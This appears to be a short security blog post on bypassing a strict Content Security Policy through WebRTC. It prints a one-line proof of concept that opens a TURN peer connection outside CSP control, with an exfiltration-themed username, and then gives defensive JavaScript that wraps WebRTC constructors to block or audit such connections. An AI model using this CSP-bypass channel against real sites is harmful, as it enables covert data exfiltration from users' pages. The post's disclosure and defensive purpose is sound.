Bypassing strict CSP by abusing WebRTC

I noticed recently that there was a PR in the w3c GitHub organisation, on both the webappsec-csp and webrtc-pc specification repos, adding a new webrtc-src directive. The PR in question:


Extracted POC:

// Constructing the peer connection is enough to start a WebRTC session toward the configured TURN server; no CSP directive currently governs this.
var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:"],"username":"_all_your_data_belongs_to_us","credential":"."}]});

Running the POC on the latest Chrome available does create a new WebRTC session, as shown in chrome://webrtc-internals, but I haven't had the opportunity to turn this into a fully working POC.


Under the strict CSP in place, this WebRTC session shouldn't have been created at all. With more prodding, this can be turned into a viable attack. Thankfully, a fix should soon be merged into the spec, after which the major browsers can implement it.
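As an added defender-side example (not code from the post or the spec PR): until a CSP directive covers WebRTC, a page that does not itself use WebRTC can wrap the peer-connection constructors to refuse, or at least audit, every creation attempt. The `installWebRtcGuard` name and its `root` parameter are my own; it is written against whatever global object it is given so it can be exercised on a constructed stub outside a browser.

```javascript
'use strict';

// Constructor names under which WebRTC peer connections have been exposed.
const WEBRTC_CTORS = ['RTCPeerConnection', 'webkitRTCPeerConnection', 'mozRTCPeerConnection'];

// Wrap every WebRTC constructor found on `root` (window in a browser; a
// constructed stub object in the test). Each construction attempt is
// recorded and reported; when `allowed` is false it is refused before any
// ICE/TURN traffic can start. Returns the list of recorded attempts.
function installWebRtcGuard(root, { allowed = false, report = () => {} } = {}) {
  const attempts = [];
  for (const name of WEBRTC_CTORS) {
    const original = root[name];
    if (typeof original !== 'function') continue;
    const guarded = function (config, ...rest) {
      const servers = (config && Array.isArray(config.iceServers)) ? config.iceServers : [];
      const urls = servers
        .flatMap(s => (Array.isArray(s.urls) ? s.urls : [s.urls]))
        .filter(u => typeof u === 'string');
      const record = {
        ctor: name,
        urls,
        // TURN credentials travel to the server named in the URL, outside any
        // connect-src restriction, so flag configurations that carry them.
        hasCredentials: servers.some(s => Boolean(s.username || s.credential)),
      };
      attempts.push(record);
      report(record);
      if (!allowed) throw new Error(`${name} blocked by page WebRTC guard`);
      return new original(config, ...rest);
    };
    guarded.prototype = original.prototype; // keep instanceof checks working
    // Non-writable and non-configurable so later scripts cannot swap the guard out.
    Object.defineProperty(root, name, {
      value: guarded, writable: false, configurable: false, enumerable: true,
    });
  }
  return attempts;
}
```

This only covers the realm it is installed in: a script can still obtain a fresh constructor from a newly created iframe, so treat it as an audit and interim measure rather than a replacement for the spec change.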